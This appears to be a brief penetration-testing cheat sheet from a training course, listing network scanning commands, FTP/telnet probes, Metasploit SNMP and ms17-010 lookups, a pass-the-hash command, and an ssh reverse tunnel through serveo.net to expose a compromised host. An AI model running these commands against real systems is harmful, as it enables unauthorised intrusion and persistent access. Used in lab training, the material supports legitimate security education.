cyberdocs:example_scan_take-session_privilage-escalation
identify alive hosts
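# seq prints the integers 1..254, one per line; they become the last octet below.
seq 1 254
# Ping every address in 172.16.60.0/24 once and save the replies, so the filter
# below has an output.txt to read (the loop alone only prints to the terminal).
# -n keeps ping's output numeric so the address stays in a fixed field.
for i in $(seq 1 254); do ping -n -c 1 "172.16.60.$i"; done > output.txt
# Only hosts that answered produce a "bytes from" line; the "bytes of data"
# header is printed for every address, alive or not. Field 4 is "ADDR:".
grep 'bytes from' output.txt | cut -d ' ' -f 4 | tr -d ':'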

nmap 172.16.60.0/24 ### 1. checks for alive hosts, then the top 1025 well-known ports
nmap -sn 172.16.60.1/24 ### -sn only checks whether each host is up
nmap 172.16.60.1/24 -p- ### -p- checks the whole port range
nmap -sS -sV 172.16.1.172 -- -p5988 ### check specific port

attempts on open ports found via nmap
ftp
try anonymous/anonymous
ftp 172.16.1.19
telnet 172.16.1.19 21
telnet 172.16.1.19

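after you have gained shell access: reverse tunnel that publishes the host's local port 80 through the serveo.net relay (visible to defenders as outbound SSH to a third-party tunnelling service)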
ssh -R cyberacademy2018:80:localhost:80 serveo.net

rtsp 554 (with vlc)
in vlc, network URL: rtsp://172.16.1.19:554

snmp
sudo msfconsole	
auxiliary
set community filename
exploit
search ms17-010

windows
# searchsploit "windows server 2008"
# locate windows/remote/41987.py
./pth-winexe -U WOURKGROUP/user%hash //172.16.1.204 cmd ### pass the hash